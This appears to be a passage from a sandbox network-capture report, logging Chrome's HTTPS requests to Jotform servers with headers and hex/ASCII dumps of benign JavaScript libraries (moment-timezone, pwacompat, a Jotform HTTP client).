                                                                                                                                                                                                                                            2025-01-10 12:35:56 UTC1369INData Raw: 22 78 22 3d 3d 3d 4d 2e 5f 66 3b 72 65 74 75 72 6e 21 28 21 4d 2e 5f 61 7c 7c 76 6f 69 64 20 30 21 3d 3d 4d 2e 5f 74 7a 6d 7c 7c 7a 29 7d 66 75 6e 63 74 69 6f 6e 20 43 28 4d 29 7b 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 63 6f 6e 73 6f 6c 65 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 26 26 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 28 4d 29 7d 66 75 6e 63 74 69 6f 6e 20 53 28 4d 29 7b 76 61 72 20 7a 3d 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 73 6c 69 63 65 2e 63 61 6c 6c 28 61 72 67 75 6d 65 6e 74 73 2c 30 2c 2d 31 29 2c 62 3d 61 72 67 75 6d 65 6e 74 73 5b 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 2d 31 5d 2c 70 3d 74 28 62 29 2c 7a 3d 4f 2e 75 74 63 2e 61 70 70 6c 79
                                                                                                                                                                                                                                            Data Ascii: "x"===M._f;return!(!M._a||void 0!==M._tzm||z)}function C(M){"undefined"!=typeof console&&"function"==typeof console.error&&console.error(M)}function S(M){var z=Array.prototype.slice.call(arguments,0,-1),b=arguments[arguments.length-1],p=t(b),z=O.utc.apply
                                                                                                                                                                                                                                            2025-01-10 12:35:56 UTC1369INData Raw: 28 4d 2e 61 74 29 2e 72 65 70 6c 61 63 65 28 2f 5b 5e 41 2d 5a 5d 2f 67 2c 22 22 29 21 3d 3d 4d 2e 61 62 62 72 26 26 74 68 69 73 2e 61 62 62 72 53 63 6f 72 65 2b 2b 7d 2c 53 2e 76 65 72 73 69 6f 6e 3d 22 30 2e 35 2e 34 33 22 2c 53 2e 64 61 74 61 56 65 72 73 69 6f 6e 3d 22 22 2c 53 2e 5f 7a 6f 6e 65 73 3d 57 2c 53 2e 5f 6c 69 6e 6b 73 3d 41 2c 53 2e 5f 6e 61 6d 65 73 3d 64 2c 53 2e 5f 63 6f 75 6e 74 72 69 65 73 3d 63 2c 53 2e 61 64 64 3d 54 2c 53 2e 6c 69 6e 6b 3d 6c 2c 53 2e 6c 6f 61 64 3d 73 2c 53 2e 7a 6f 6e 65 3d 74 2c 53 2e 7a 6f 6e 65 45 78 69 73 74 73 3d 6d 2c 53 2e 67 75 65 73 73 3d 66 75 6e 63 74 69 6f 6e 28 4d 29 7b 72 65 74 75 72 6e 20 7a 3d 7a 26 26 21 4d 3f 7a 3a 65 28 29 7d 2c 53 2e 6e 61 6d 65 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72
                                                                                                                                                                                                                                            Data Ascii: (M.at).replace(/[^A-Z]/g,"")!==M.abbr&&this.abbrScore++},S.version="0.5.43",S.dataVersion="",S._zones=W,S._links=A,S._names=d,S._countries=c,S.add=T,S.link=l,S.load=s,S.zone=t,S.zoneExists=m,S.guess=function(M){return z=z&&!M?z:e()},S.names=function(){var
                                                                                                                                                                                                                                            2025-01-10 12:35:56 UTC1369INData Raw: 2f 6d 6f 6d 65 6e 74 6a 73 2e 63 6f 6d 2f 74 69 6d 65 7a 6f 6e 65 2f 64 6f 63 73 2f 23 2f 64 61 74 61 2d 6c 6f 61 64 69 6e 67 2f 2e 22 29 2c 74 68 69 73 7d 69 66 28 74 68 69 73 2e 5f 7a 29 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 7a 2e 6e 61 6d 65 7d 2c 4d 2e 7a 6f 6e 65 4e 61 6d 65 3d 50 28 4d 2e 7a 6f 6e 65 4e 61 6d 65 29 2c 4d 2e 7a 6f 6e 65 41 62 62 72 3d 50 28 4d 2e 7a 6f 6e 65 41 62 62 72 29 2c 4d 2e 75 74 63 3d 44 28 4d 2e 75 74 63 29 2c 4d 2e 6c 6f 63 61 6c 3d 44 28 4d 2e 6c 6f 63 61 6c 29 2c 4d 2e 75 74 63 4f 66 66 73 65 74 3d 28 67 3d 4d 2e 75 74 63 4f 66 66 73 65 74 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 30 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 26 26 28 74 68 69 73 2e 5f 7a 3d 6e 75 6c 6c 29 2c 67 2e 61 70 70 6c 79
                                                                                                                                                                                                                                            Data Ascii: /momentjs.com/timezone/docs/#/data-loading/."),this}if(this._z)return this._z.name},M.zoneName=P(M.zoneName),M.zoneAbbr=P(M.zoneAbbr),M.utc=D(M.utc),M.local=D(M.local),M.utcOffset=(g=M.utcOffset,function(){return 0<arguments.length&&(this._z=null),g.apply
                                                                                                                                                                                                                                            2025-01-10 12:35:56 UTC1369INData Raw: 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32
                                                                                                                                                                                                                                            Data Ascii: 212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212
                                                                                                                                                                                                                                            2025-01-10 12:35:56 UTC1369INData Raw: 31 64 30 20 31 71 4c 30 20 58 64 30 20 31 6f 4c 30 20 31 31 64 30 20 31 6f 4c 30 20 31 31 64 30 20 31 70 62 30 20 31 31 64 30 20 31 6f 4c 30 20 31 31 64 30 20 31 6f 4c 30 20 31 31 64 30 20 31 6e 79 30 20 31 31 7a 30 20 31 6f 31 30 20 31 31 7a 30 20 31 6f 31 30 20 31 31 7a 30 20 31 6f 31 30 20 31 31 7a 30 20 31 71 4e 30 20 31 31 7a 30 20 31 6f 31 30 20 31 31 7a 30 20 31 6f 31 30 20 31 31 7a 30 20 31 6f 31 30 20 31 31 7a 30 20 31 6f 31 30 20 31 31 7a 30 20 31 71 4e 30 20 31 31 7a 30 20 31 6f 31 30 20 31 31 7a 30 20 31 6f 31 30 20 57 4c 30 20 31 71 4e 30 20 52 62 30 20 31 77 70 30 20 4f 6e 30 20 31 7a 64 30 20 4c 7a 30 20 31 45 4e 30 20 46 62 30 20 63 31 30 20 38 6e 30 20 38 4e 64 30 20 67 4c 30 20 65 31 30 20 6d 6e 30 20 6b 53 70 30 20 31 63 4c 30 20 31 63
                                                                                                                                                                                                                                            Data Ascii: 1d0 1qL0 Xd0 1oL0 11d0 1oL0 11d0 1pb0 11d0 1oL0 11d0 1oL0 11d0 1ny0 11z0 1o10 11z0 1o10 11z0 1o10 11z0 1qN0 11z0 1o10 11z0 1o10 11z0 1o10 11z0 1o10 11z0 1qN0 11z0 1o10 11z0 1o10 WL0 1qN0 Rb0 1wp0 On0 1zd0 Lz0 1EN0 Fb0 c10 8n0 8Nd0 gL0 e10 mn0 kSp0 1cL0 1c
                                                                                                                                                                                                                                            2025-01-10 12:35:56 UTC1369INData Raw: 63 4c 30 20 31 63 4e 30 20 31 63 4c 30 20 31 63 4e 30 20 31 66 7a 30 20 31 61 31 30 20 31 66 7a 30 20 31 61 31 30 20 31 66 7a 30 20 31 63 4e 30 20 31 63 4c 30 20 31 63 4e 30 20 31 63 4c 30 20 31 63 4e 30 20 31 63 4c 30 20 31 63 4e 30 20 31 66 7a 30 20 31 61 31 30 20 31 66 7a 30 20 31 63 4e 30 20 31 63 4c 30 20 31 63 4e 30 20 31 63 4c 30 20 31 63 4e 30 20 31 63 4c 30 20 31 63 4e 30 20 31 66 7a 30 20 31 61 31 30 20 31 66 7a 30 20 31 61 31 30 20 31 66 7a 30 20 31 63 4e 30 20 31 63 4c 30 20 31 63 4e 30 20 31 63 4c 30 20 31 63 4e 30 20 31 63 4c 30 20 31 63 4e 30 20 31 66 7a 30 20 31 61 31 30 20 31 66 7a 30 20 31 63 4e 30 20 31 63 4c 30 20 31 63 4e 30 20 31 63 4c 30 20 31 63 4e 30 20 31 63 4c 30 20 31 63 4e 30 20 31 63 4c 30 20 31 63 4e 30 20 31 66 7a 30 20 31
                                                                                                                                                                                                                                            Data Ascii: cL0 1cN0 1cL0 1cN0 1fz0 1a10 1fz0 1a10 1fz0 1cN0 1cL0 1cN0 1cL0 1cN0 1cL0 1cN0 1fz0 1a10 1fz0 1cN0 1cL0 1cN0 1cL0 1cN0 1cL0 1cN0 1fz0 1a10 1fz0 1a10 1fz0 1cN0 1cL0 1cN0 1cL0 1cN0 1cL0 1cN0 1fz0 1a10 1fz0 1cN0 1cL0 1cN0 1cL0 1cN0 1cL0 1cN0 1cL0 1cN0 1fz0 1
                                                                                                                                                                                                                                            2025-01-10 12:35:56 UTC1369INData Raw: 31 66 7a 30 20 31 61 31 30 20 31 66 7a 30 20 31 61 31 30 20 31 66 7a 30 20 31 63 4e 30 20 31 63 4c 30 20 31 63 4e 30 20 31 63 4c 30 20 31 63 4e 30 20 31 63 4c 30 20 31 63 4e 30 20 31 66 7a 30 20 31 61 31 30 20 31 66 7a 30 20 31 63 4e 30 20 31 63 4c 30 20 31 63 4e 30 20 31 63 4c 30 20 31 63 4e 30 20 31 63 4c 30 20 31 63 4e 30 20 31 63 4c 30 20 31 63 4e 30 20 31 66 7a 30 20 31 61 31 30 20 31 66 7a 30 20 31 63 4e 30 20 31 63 4c 30 20 31 63 4e 30 20 31 63 4c 30 20 31 63 4e 30 20 31 63 4c 30 20 31 63 4e 30 20 31 66 7a 30 20 31 61 31 30 20 31 66 7a 30 20 31 61 31 30 20 31 66 7a 30 20 31 63 4e 30 20 31 63 4c 30 20 31 63 4e 30 20 31 63 4c 30 20 31 63 4e 30 20 31 63 4c 30 20 31 63 4e 30 20 31 66 7a 30 20 31 61 31 30 20 31 66 7a 30 20 31 63 4e 30 20 31 63 4c 30 20
                                                                                                                                                                                                                                            Data Ascii: 1fz0 1a10 1fz0 1a10 1fz0 1cN0 1cL0 1cN0 1cL0 1cN0 1cL0 1cN0 1fz0 1a10 1fz0 1cN0 1cL0 1cN0 1cL0 1cN0 1cL0 1cN0 1cL0 1cN0 1fz0 1a10 1fz0 1cN0 1cL0 1cN0 1cL0 1cN0 1cL0 1cN0 1fz0 1a10 1fz0 1a10 1fz0 1cN0 1cL0 1cN0 1cL0 1cN0 1cL0 1cN0 1fz0 1a10 1fz0 1cN0 1cL0


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            14192.168.2.1749720172.67.7.1074435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:35:56 UTC388OUTGET /s/vendor/static/pwacompat/2.0.11/pwacompat.min.js HTTP/1.1
                                                                                                                                                                                                                                            Host: cdn02.jotfor.ms
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            2025-01-10 12:35:56 UTC427INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 12:35:56 GMT
                                                                                                                                                                                                                                            Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                            Content-Length: 6376
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            expires: Fri, 10 Jan 2025 12:39:16 GMT
                                                                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                                                                            Age: 259
                                                                                                                                                                                                                                            last-modified: Thu, 12 Dec 2024 12:31:15 GMT
                                                                                                                                                                                                                                            etag: "ebc9f7b2083e930685a7bd68e8a9b982"
                                                                                                                                                                                                                                            x-store: gcs
                                                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8ffcb5b6598742d4-EWR
                                                                                                                                                                                                                                            2025-01-10 12:35:56 UTC942INData Raw: 66 75 6e 63 74 69 6f 6e 20 53 28 6e 29 7b 76 61 72 20 72 3d 30 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 72 3c 6e 2e 6c 65 6e 67 74 68 3f 7b 64 6f 6e 65 3a 21 31 2c 76 61 6c 75 65 3a 6e 5b 72 2b 2b 5d 7d 3a 7b 64 6f 6e 65 3a 21 30 7d 7d 7d 66 75 6e 63 74 69 6f 6e 20 54 28 6e 29 7b 76 61 72 20 72 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 26 26 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 26 26 6e 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 3b 72 65 74 75 72 6e 20 72 3f 72 2e 63 61 6c 6c 28 6e 29 3a 7b 6e 65 78 74 3a 53 28 6e 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 55 28 6e 29 7b 66 6f 72 28 76 61 72 20 72 2c 79 3d 5b 5d 3b 21 28 72 3d 6e 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 3b
                                                                                                                                                                                                                                            Data Ascii: function S(n){var r=0;return function(){return r<n.length?{done:!1,value:n[r++]}:{done:!0}}}function T(n){var r="undefined"!=typeof Symbol&&Symbol.iterator&&n[Symbol.iterator];return r?r.call(n):{next:S(n)}}function U(n){for(var r,y=[];!(r=n.next()).done;
                                                                                                                                                                                                                                            2025-01-10 12:35:56 UTC1369INData Raw: 3d 7b 63 3a 62 2e 63 7d 2c 2b 2b 65 29 7b 62 2e 63 3d 61 5b 65 5d 3b 74 72 79 7b 72 65 74 75 72 6e 20 6e 65 77 20 55 52 4c 28 22 22 2c 62 2e 63 29 2c 66 75 6e 63 74 69 6f 6e 28 67 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 70 29 7b 72 65 74 75 72 6e 28 6e 65 77 20 55 52 4c 28 70 7c 7c 22 22 2c 67 2e 63 29 29 2e 74 6f 53 74 72 69 6e 67 28 29 7d 7d 28 62 29 7d 63 61 74 63 68 28 67 29 7b 7d 7d 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 67 29 7b 72 65 74 75 72 6e 20 67 7c 7c 22 22 7d 7d 66 75 6e 63 74 69 6f 6e 20 45 28 61 2c 62 29 7b 61 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 61 29 3b 66 6f 72 28 76 61 72 20 65 20 69 6e 20 62 29 61 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 65 2c 62 5b 65 5d 29 3b 64 6f 63 75 6d
                                                                                                                                                                                                                                            Data Ascii: ={c:b.c},++e){b.c=a[e];try{return new URL("",b.c),function(g){return function(p){return(new URL(p||"",g.c)).toString()}}(b)}catch(g){}}return function(g){return g||""}}function E(a,b){a=document.createElement(a);for(var e in b)a.setAttribute(e,b[e]);docum
                                                                                                                                                                                                                                            2025-01-10 12:35:56 UTC1369INData Raw: 45 6c 65 6d 65 6e 74 28 22 6c 69 6e 6b 22 29 3b 0a 6b 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 72 65 6c 22 2c 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 73 74 61 72 74 75 70 2d 69 6d 61 67 65 22 29 3b 6b 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 6d 65 64 69 61 22 2c 22 28 6f 72 69 65 6e 74 61 74 69 6f 6e 3a 20 22 2b 66 2b 22 29 22 29 3b 6b 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 68 72 65 66 22 2c 63 29 3b 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 6b 29 7d 66 75 6e 63 74 69 6f 6e 20 70 28 66 2c 63 29 7b 76 61 72 20 6b 3d 77 69 6e 64 6f 77 2e 73 63 72 65 65 6e 2c 6d 3d 65 28 6b 2e 61 76 61 69 6c 57 69 64 74 68 2c 6b 2e 61 76 61 69 6c 48 65 69 67 68 74 2c 22 70 6f 72 74 72 61 69 74 22 2c 66 29 2c 64 3d 65 28 6b 2e
                                                                                                                                                                                                                                            Data Ascii: Element("link");k.setAttribute("rel","apple-touch-startup-image");k.setAttribute("media","(orientation: "+f+")");k.setAttribute("href",c);document.head.appendChild(k)}function p(f,c){var k=window.screen,m=e(k.availWidth,k.availHeight,"portrait",f),d=e(k.
                                                                                                                                                                                                                                            2025-01-10 12:35:56 UTC1369INData Raw: 3d 61 2e 64 69 73 70 6c 61 79 3b 71 3d 2d 31 21 3d 3d 58 2e 69 6e 64 65 78 4f 66 28 4e 29 3b 68 28 22 6d 6f 62 69 6c 65 2d 77 65 62 2d 61 70 70 2d 63 61 70 61 62 6c 65 22 2c 71 29 3b 59 28 61 2e 74 68 65 6d 65 5f 63 6f 6c 6f 72 7c 7c 22 62 6c 61 63 6b 22 2c 57 29 3b 5a 26 26 28 68 28 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 2c 61 2e 73 68 6f 72 74 5f 6e 61 6d 65 29 2c 68 28 22 6d 73 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 6f 6f 6c 74 69 70 22 2c 61 2e 64 65 73 63 72 69 70 74 69 6f 6e 29 2c 0a 68 28 22 6d 73 61 70 70 6c 69 63 61 74 69 6f 6e 2d 73 74 61 72 74 75 72 6c 22 2c 62 28 61 2e 73 74 61 72 74 5f 75 72 6c 7c 7c 22 2e 22 29 29 2c 68 28 22 6d 73 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 76 62 75 74 74 6f 6e 2d 63 6f 6c 6f 72 22 2c 61 2e 74
                                                                                                                                                                                                                                            Data Ascii: =a.display;q=-1!==X.indexOf(N);h("mobile-web-app-capable",q);Y(a.theme_color||"black",W);Z&&(h("application-name",a.short_name),h("msapplication-tooltip",a.description),h("msapplication-starturl",b(a.start_url||".")),h("msapplication-navbutton-color",a.t
                                                                                                                                                                                                                                            2025-01-10 12:35:56 UTC1327INData Raw: 3a 7b 74 72 79 7b 76 61 72 20 67 3d 57 69 6e 64 6f 77 73 2e 55 49 2e 56 69 65 77 4d 61 6e 61 67 65 6d 65 6e 74 2e 41 70 70 6c 69 63 61 74 69 6f 6e 56 69 65 77 2e 67 65 74 46 6f 72 43 75 72 72 65 6e 74 56 69 65 77 28 29 2e 74 69 74 6c 65 42 61 72 3b 62 72 65 61 6b 20 61 7d 63 61 74 63 68 28 70 29 7b 7d 67 3d 76 6f 69 64 20 30 7d 69 66 28 62 3d 67 29 62 2e 66 6f 72 65 67 72 6f 75 6e 64 43 6f 6c 6f 72 3d 50 28 65 3f 22 62 6c 61 63 6b 22 3a 22 77 68 69 74 65 22 29 2c 62 2e 62 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 3d 50 28 61 29 7d 7d 7d 66 75 6e 63 74 69 6f 6e 20 50 28 61 29 7b 61 3d 51 28 61 29 3b 72 65 74 75 72 6e 7b 72 3a 61 5b 30 5d 2c 67 3a 61 5b 31 5d 2c 62 3a 61 5b 32 5d 2c 61 3a 61 5b 33 5d 7d 7d 66 75 6e 63 74 69 6f 6e 20 51 28 61 29 7b 76 61 72
                                                                                                                                                                                                                                            Data Ascii: :{try{var g=Windows.UI.ViewManagement.ApplicationView.getForCurrentView().titleBar;break a}catch(p){}g=void 0}if(b=g)b.foregroundColor=P(e?"black":"white"),b.backgroundColor=P(a)}}}function P(a){a=Q(a);return{r:a[0],g:a[1],b:a[2],a:a[3]}}function Q(a){var


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            15192.168.2.1749721104.19.128.1054435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:35:56 UTC609OUTGET /actions.js HTTP/1.1
                                                                                                                                                                                                                                            Host: js.jotform.com
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                            Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                                                                                                                            Referer: https://eu.jotform.com/
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            Cookie: guest=guest_5a3c5173c0bb4f63; JOTFORM_SESSION=62953b85-a26b-4264-9cab-272a8b54
                                                                                                                                                                                                                                            2025-01-10 12:35:56 UTC472INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 12:35:56 GMT
                                                                                                                                                                                                                                            Content-Type: application/x-javascript
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            last-modified: Fri, 17 May 2024 07:15:00 GMT
                                                                                                                                                                                                                                            vary: Accept-Encoding
                                                                                                                                                                                                                                            etag: W/"664703f4-2ec4"
                                                                                                                                                                                                                                            expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                                                                                                                                                                                                            Cache-Control: max-age=315360000
                                                                                                                                                                                                                                            Cache-Control: public
                                                                                                                                                                                                                                            x-static: 1
                                                                                                                                                                                                                                            access-control-allow-origin: *
                                                                                                                                                                                                                                            via: 1.1 google
                                                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8ffcb5b6586e4223-EWR
                                                                                                                                                                                                                                            2025-01-10 12:35:56 UTC897INData Raw: 32 65 63 34 0d 0a 76 61 72 20 4a 6f 74 46 6f 72 6d 41 63 74 69 6f 6e 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 6f 28 6e 2c 72 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 65 3d 6e 65 77 20 41 72 72 61 79 28 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 29 2c 74 3d 30 3b 74 3c 65 2e 6c 65 6e 67 74 68 3b 74 2b 2b 29 65 5b 74 5d 3d 61 72 67 75 6d 65 6e 74 73 5b 74 5d 3b 72 65 74 75 72 6e 20 6e 2e 61 70 70 6c 79 28 72 2c 65 29 7d 7d 76 61 72 20 74 3d 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 74 6f 53 74 72 69 6e 67 3b 66 75 6e 63 74 69 6f 6e 20 61 28 65 29 7b 72 65 74 75 72 6e 22 5b 6f 62 6a 65 63 74 20 41 72 72 61 79 5d 22 3d 3d 3d 74 2e 63 61 6c
                                                                                                                                                                                                                                            Data Ascii: 2ec4var JotFormActions=function(){"use strict";function o(n,r){return function(){for(var e=new Array(arguments.length),t=0;t<e.length;t++)e[t]=arguments[t];return n.apply(r,e)}}var t=Object.prototype.toString;function a(e){return"[object Array]"===t.cal
                                                                                                                                                                                                                                            2025-01-10 12:35:56 UTC1369INData Raw: 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 41 72 72 61 79 42 75 66 66 65 72 26 26 41 72 72 61 79 42 75 66 66 65 72 2e 69 73 56 69 65 77 3f 41 72 72 61 79 42 75 66 66 65 72 2e 69 73 56 69 65 77 28 65 29 3a 65 26 26 65 2e 62 75 66 66 65 72 26 26 65 2e 62 75 66 66 65 72 20 69 6e 73 74 61 6e 63 65 6f 66 20 41 72 72 61 79 42 75 66 66 65 72 7d 2c 69 73 53 74 72 69 6e 67 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 65 7d 2c 69 73 4e 75 6d 62 65 72 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 22 6e 75 6d 62 65 72 22 3d 3d 74 79 70 65 6f 66 20 65 7d 2c 69 73 4f 62 6a 65 63 74 3a 6e 2c 69 73 55 6e 64 65 66 69 6e 65 64 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e
                                                                                                                                                                                                                                            Data Ascii: "undefined"!=typeof ArrayBuffer&&ArrayBuffer.isView?ArrayBuffer.isView(e):e&&e.buffer&&e.buffer instanceof ArrayBuffer},isString:function(e){return"string"==typeof e},isNumber:function(e){return"number"==typeof e},isObject:n,isUndefined:function(e){return
                                                                                                                                                                                                                                            2025-01-10 12:35:56 UTC1369INData Raw: 72 6e 20 74 68 69 73 2e 68 61 6e 64 6c 65 72 73 2e 70 75 73 68 28 7b 66 75 6c 66 69 6c 6c 65 64 3a 65 2c 72 65 6a 65 63 74 65 64 3a 74 7d 29 2c 74 68 69 73 2e 68 61 6e 64 6c 65 72 73 2e 6c 65 6e 67 74 68 2d 31 7d 2c 65 2e 70 72 6f 74 6f 74 79 70 65 2e 65 6a 65 63 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 68 69 73 2e 68 61 6e 64 6c 65 72 73 5b 65 5d 26 26 28 74 68 69 73 2e 68 61 6e 64 6c 65 72 73 5b 65 5d 3d 6e 75 6c 6c 29 7d 2c 65 2e 70 72 6f 74 6f 74 79 70 65 2e 66 6f 72 45 61 63 68 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 64 2e 66 6f 72 45 61 63 68 28 74 68 69 73 2e 68 61 6e 64 6c 65 72 73 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6e 75 6c 6c 21 3d 3d 65 26 26 74 28 65 29 7d 29 7d 3b 66 75 6e 63 74 69 6f 6e 20 73 28 74 2c 6e 2c 65 29 7b 72 65 74 75 72 6e
                                                                                                                                                                                                                                            Data Ascii: rn this.handlers.push({fulfilled:e,rejected:t}),this.handlers.length-1},e.prototype.eject=function(e){this.handlers[e]&&(this.handlers[e]=null)},e.prototype.forEach=function(t){d.forEach(this.handlers,function(e){null!==e&&t(e)})};function s(t,n,e){return
                                                                                                                                                                                                                                            2025-01-10 12:35:56 UTC1369INData Raw: 2c 68 6f 73 74 6e 61 6d 65 3a 6d 2e 68 6f 73 74 6e 61 6d 65 2c 70 6f 72 74 3a 6d 2e 70 6f 72 74 2c 70 61 74 68 6e 61 6d 65 3a 22 2f 22 3d 3d 3d 6d 2e 70 61 74 68 6e 61 6d 65 2e 63 68 61 72 41 74 28 30 29 3f 6d 2e 70 61 74 68 6e 61 6d 65 3a 22 2f 22 2b 6d 2e 70 61 74 68 6e 61 6d 65 7d 7d 66 75 6e 63 74 69 6f 6e 20 76 28 29 7b 74 68 69 73 2e 6d 65 73 73 61 67 65 3d 22 53 74 72 69 6e 67 20 63 6f 6e 74 61 69 6e 73 20 61 6e 20 69 6e 76 61 6c 69 64 20 63 68 61 72 61 63 74 65 72 22 7d 28 76 2e 70 72 6f 74 6f 74 79 70 65 3d 6e 65 77 20 45 72 72 6f 72 29 2e 63 6f 64 65 3d 35 2c 76 2e 70 72 6f 74 6f 74 79 70 65 2e 6e 61 6d 65 3d 22 49 6e 76 61 6c 69 64 43 68 61 72 61 63 74 65 72 45 72 72 6f 72 22 3b 66 75 6e 63 74 69 6f 6e 20 45 28 70 29 7b 72 65 74 75 72 6e 20 6e
